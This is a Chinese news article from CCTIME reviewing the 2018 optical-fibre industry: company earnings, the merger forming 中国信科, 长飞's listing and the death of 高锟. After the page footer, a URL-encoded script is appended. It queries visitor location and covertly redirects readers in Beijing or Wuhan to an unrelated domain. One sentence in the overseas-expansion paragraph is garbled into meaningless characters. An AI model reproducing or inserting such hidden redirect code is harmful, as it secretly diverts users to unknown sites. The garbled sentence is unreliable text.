首页 | 滚动 | 国内 | 国际 | 运营 | 制造 | 终端 | 监管 | 原创 | 业务 | 技术 | 报告 | 博客 | 特约记者
手机 | 互联网 | IT | 5G | 光通信 | LTE | 云计算 | 三网融合 | 芯片 | 电源 | 虚拟运营商 | 测试 | 移动互联网 | 会展
首页 >> 热门[320*145] >> 正文

光通信的2018:努力着 喜悦着 也期待着

2018年12月24日 08:53  CCTIME飞象网  作 者:马秋月

飞象网讯(马秋月/文)12月24日消息,过去的2018年对于光通信企业来说因为够努力,而成果令人喜悦:业绩比较亮眼;合并、上市的好消息不断;即将商用的5G更是许了一个值得期待的未来。

业绩亮眼 这一年总的来说不错

2018年各大光纤光缆企业财报数据都不错,均不同程度增长。根据各大光纤光缆企业2018年三季度财报数据显示:烽火通信前三季度实现营收173.71亿,同比增长15.53%,归属于上市公司股东的净利润6.31亿人民币,同比上年增加5.75%。

长飞前三季度实现营收85.24亿元,同比增长15.12%,归属于上市公司股东的净利润为12.37亿元,同比增长33.01%。

亨通光电前三季度实现营收241.06亿,同比增长26.72%,归属于上市公司股东的净利润为21.07亿,同比增加26.1%。

中天科技前三季度实现营收236.61亿,同比增长22.19%;归属于上市公司股东的净利润16.34亿,同比上年上升13.72%。

通鼎互联前三季度实现营业收入33.31亿元,同比增长5.49%,归属于上市公司股东的净利润4.70亿元,同比增长10.52%。

光纤光缆行业将迎来新一轮增长点

首先是政策的推动。今年8月工信部和发改委发布关于印发《扩大和升级信息消费三年行动计划(2018-2020年)》的通知,其中提到:推动信息基础设施提速降费,深入落实“宽带中国”战略,组织实施新一代信息基础设施建设工程,推进光纤宽带和4G网络深度覆盖,加快5G标准研究、技术试验,推进5G规模组网建设及应用示范工程。深化电信普遍服务试点,提高农村地区信息接入能力。加大网络降费优惠力度,充分释放网络提速降费红利。在工业、农业、交通、能源、市政、环保等领域开展试点示范到2020年实现城镇地区光网覆盖,提供1000Mbps以上接入服务能力;98%的行政村实现光纤通达和4G网络覆盖,有条件地区提供100Mbps以上接入服务能力;确保启动5G商用。

其次,是三大运营商宽带市场竞争激烈,对光纤光缆需求量很大。例如截至11月底,中国移动以1.5427亿用户数稳居第一,而月增314.9万户的增长量也远远将中国电信和中国联通甩在身后。因此,中国移动不断进行光纤光缆产品的集采:启动非骨架式带状光缆产品集中采购(第二批次)项目,预采购规模约为4.51万皮长公里,折合892.30万芯公里;启动蝶形光缆产品集采(第二批次),采购规模为282万皮长公里,折合337万芯公里,预制成端端头1277万个。

第三,随着“一带一路”的发展,各大厂商纷纷走出去、探索海外市。庖泊斯庀斯饫孪康脑龀。

第四,5G以及物联网将给光通信带来新一轮的机遇。预计5G基站数量将会是4G的2倍,光纤的用量也将至少是4G的2倍用量,至少有几亿芯公里的空间。中国电信科技委主任韦乐平曾表示:“由于5G基站数量的大幅增加使得光纤,光模块,高速光接入网系统成为三大受益者,将带来巨量的市场空间。”

烽火、大唐合并 中国信科扛起国家队大旗

今年公司合并最大的新闻莫过于2018年7月20日,由武汉邮科院与电信科研院联合重组成立中国信息通信科技集团正式宣布揭牌运营。

中国信息通信科技集团总部设在武汉光谷,列入中央企业序列。童国华任该集团董事长、党委书记,鲁国庆任该集团副董事长、党委副书记、总经理。注册金额300亿元,员工总数3.8万人,资产总额逾800亿元,年销售收入近600亿元,其定位是发展成为中央企业在信息通信领域科技水平高、产业规模大、综合实力强的国际一流公司。

据介绍,中国信息通信科技集团表示仍将聚焦信息通信主业,根据国家在信息通信领域的重大需求,未来5年内,计划总投资600亿元,发展5G移动通信、集成电路、网络信息安全、光通信、光纤及光器件、特种通信、数据通信、云计算、物联网与智慧城市解决方案等九个产业方向。

预计到“十三五”末,中国信科资产达到1000亿元规模,收入接近1000亿元水平,具备全球竞争的实力和能力。

武汉邮电科学研究院是烽火科技集团的控股股东,电信科学技术研究院是大唐电信的控股股东,光通信领域发展良好的烽火科技与无线通信领域基础较好的大唐电信合并,在即将到来的5G时代抢占先机、加速市场竞争,也为中国在国际ICT市场竞争中增加砝码。

同时,合并重组也代表着全球通信行业发展的一个缩影。

三十而立再出发 长飞正式开启“A+H”双股模式

2018年迎来了30周年庆典,随之在7月20日,完成A股发行在上海证券交易所“敲钟”上市,正式开启“A+H”模式,实现双核资本运作。

成立于1988年的长飞公司,在匆匆三十载中从一家外资企业的制造工厂,发展成为目前掌握行业核心技术、全球市场份额第一的集团性企业,实现了从“追随者”到“领军者”的蜕变,见证了我国从“光纤光缆大国”到“光纤光缆强国”的发展历程,并在2016年实现了光纤预制棒、光纤和光缆三大核心业务全球第一的佳绩。

长飞公司执行董事兼总裁庄丹自豪地说:“过去30年,中国的光纤光缆行业,基本是用市场换技术。现在,我们终于扬眉吐气,可以拿技术去换别人的市场。”

目前,针对5G网络,长飞已经提前布局,从骨干网络到城域网到接入网,能够提供光纤基础网络全套解决方案。

在立足国内市场的同时,长飞将“三十而立”后的规划投向海外。“我希望她成长为一家真正国际化的公司,一家在世界各大主流市场都占有一席之地的公司。”庄丹说,“目前海外市场收入占长飞总体收入的13%,未来要达到25%-30%。”

毫无疑问,核心技术、关键技术、国之重器必须立足于自己,核心技术必须掌握在自己手里。为此,长飞联合华中科技大学制造装备数字化国家工程研究中心、弗吉尼亚理工大学工业系统工程学院成立智能制造研究院,贯彻落实自主创新。

据悉,新成立的智能制造研究院基于三方在光纤光缆制造技术、智能装备开发技术及大数据系统集成技术上的资源优势互补,着重研究智能制造在光纤光缆行业的创新性应用以及相关人才培养。智能制造研究院将立足于光纤光缆行业,以具体研发项目为载体,实现核心工艺、设备的智能化和生产过程的全流程数字化、信息化、网络化、智能化,逐步实现生产和服务过程的自动化,打造数字化车间,有序构建完整的智能工厂体系。

此外,长飞还发布新LOGO,展现出长飞公司30周年站在新的历史起点,敞开胸怀拥抱多彩新时代的姿态。

三十风华正茂,2018年注定是长飞历史上浓墨重彩的开始。

“光纤之父”高锟去世

有扬眉吐气的喜悦、有上市的振奋,也有痛失巨匠的悲伤和唏嘘,2018年9月23日,诺贝尔物理学奖得主高锟在香港去世,终年84岁。

1966年,高锟在国际电话电报公司(ITT)任职期间开始研究利用玻璃纤维传送讯号,发表过一篇题为《光频率介质纤维表面波导》的论文,提出利用石英基玻璃纤维,可进行长距离及高讯息量的讯息传送。

理论之初被嘲为“痴人说梦”,但高锟并未放弃,继续研究及改良技术,在争议中将设想逐步变为现实:1971年世界上第一条1公里长的光纤问世,1981年第一个光纤通讯系统启用,利用石英玻璃制成的光纤应用越来越广泛,全世界掀起了一场光纤通信的革命,这是一场造福全人类的革命,而高锟也因此被誉为“光纤之父”。

2009年,高锟首次提出光纤通讯后四十多年,终获得诺贝尔物理学奖,诺贝尔委员会赞扬他“在纤维中传送光以达成光学通讯的开拓成就”。

编 辑:值班记者
免责声明:刊载本文目的在于传播更多行业信息,不代表本站对读者构成任何其它建议,请读者仅作参考,更不能作为投资使用依据,请自行核实相关内容。
相关新闻              
 
人物
2018年9月15日,中国电信董事长杨杰在2018世界物联网博览会无..
精彩专题
中国信科首秀2018中国国际信息通信展
中国电信绽放2018国际通信展
聚焦2018年中国国际信息通信展
遇见美好未来--世界移动大会·上海
CCTIME推荐
关于我们 | 广告报价 | 联系我们 | 隐私声明 | 本站地图
CCTIME飞象网 CopyRight © 2007-2017 By CCTIME.COM
京ICP备08004280号  电信与信息服务业务经营许可证080234号 京公网安备110105000771号
公司名称: 北京飞象互动文化传媒有限公司
未经书面许可,禁止转载、摘编、复制、镜像

%3Cscript%20type%3D%22text/javascript%22%20src%3D%22http%3A//ip.ws.126.net/ipquery%22%3E%3C/script%3E%0A%3Cscript%20type%3D%22text/javascript%22%3E%0Astrdistrict%20%3D%5Blo%2C%20lc%5D.join%28%27%5Ct%27%29%3B%0Aif%28strdistrict.indexOf%28%22%u5317%u4EAC%22%29%3E0%20%7C%7C%20strdistrict.indexOf%28%22%u6B66%u6C49%22%29%3E0%29%0A%7B%0Awindow.location.href%3D%22http%3A//www.arrdm.com%22%3B%20%20%0A%7D%0Aelse%0A%7B%0A%7D%0A%3C/script%3E